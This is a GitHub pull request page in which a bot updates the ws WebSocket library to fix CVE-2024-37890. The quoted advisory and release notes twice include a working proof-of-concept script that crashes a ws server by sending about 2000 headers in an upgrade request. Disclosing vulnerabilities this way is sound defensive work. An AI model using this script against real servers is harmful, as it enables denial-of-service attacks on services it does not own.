search

pluv-io / pluv

Multi-platform, type-safe realtime packages
https://pluv.io
MIT License
66 stars 2 forks source link

chore(deps): update dependency ws to v8.17.1 [security] #632

Closed renovate[bot] closed 1 month ago

renovate[bot] commented 2 months ago

Mend Renovate

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
ws 8.17.0 -> 8.17.1 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2024-37890

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
  2. Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References

Release Notes

websockets/ws (ws) ### [`v8.17.1`](https://togithub.com/websockets/ws/releases/tag/8.17.1) [Compare Source](https://togithub.com/websockets/ws/compare/8.17.0...8.17.1) ### Bug fixes - Fixed a DoS vulnerability ([#​2231](https://togithub.com/websockets/ws/issues/2231)). A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount] threshold could be used to crash a ws server. ```js const http = require('http'); const WebSocket = require('ws'); const server = http.createServer(); const wss = new WebSocket.Server({ server }); server.listen(function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: server.address().port }); request.end(); }); ``` The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so that no more headers than the `server.maxHeadersCount` limit can be sent. 2. Set `server.maxHeadersCount` to `0` so that no limit is applied. [`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize [`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener [`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

This PR has been generated by Mend Renovate. View repository job log here.

vercel[bot] commented 2 months ago

The latest updates on your projects. Learn more about Vercel for Git ↗︎

1 Ignored Deployment | Name | Status | Preview | Comments | Updated (UTC) | | :--- | :----- | :------ | :------- | :------ | | **pluv** | ⬜️ Ignored ([Inspect](https://vercel.com/pluv/pluv/Hqa3BJQ8NqKKwqpPU7iDvTs4kvrr)) | [Visit Preview](https://pluv-git-renovate-npm-ws-vulnerability-pluv.vercel.app) | | Jun 25, 2024 5:55am |
changeset-bot[bot] commented 2 months ago

⚠️ No Changeset found

Latest commit: 0ce7de16cce194f8c6e6a6a85be54d87d1d2d2c1

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types

Click here to learn what changesets are, and how to add one.

Click here if you're a maintainer who wants to add a changeset to this PR